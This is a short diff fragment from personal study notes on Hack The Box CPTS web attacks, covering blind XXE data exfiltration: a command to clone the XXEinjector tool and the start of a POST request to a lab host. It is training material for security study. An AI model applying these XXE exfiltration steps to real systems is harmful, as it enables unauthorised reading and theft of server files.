markmarsala/ObsidianVault/HTB/HTB CPTS/Web Attacks/XXE/Blind Data Exfiltration.md

 git clone https://github.com/enjoiz/XXEinjector
 ```

-All we need to do is send this request:
+All we need to do is send this request, with XXEINJECT after xml version:
 ```xml
 POST /blind/submitDetails.php HTTP/1.1
 Host: 10.129.201.94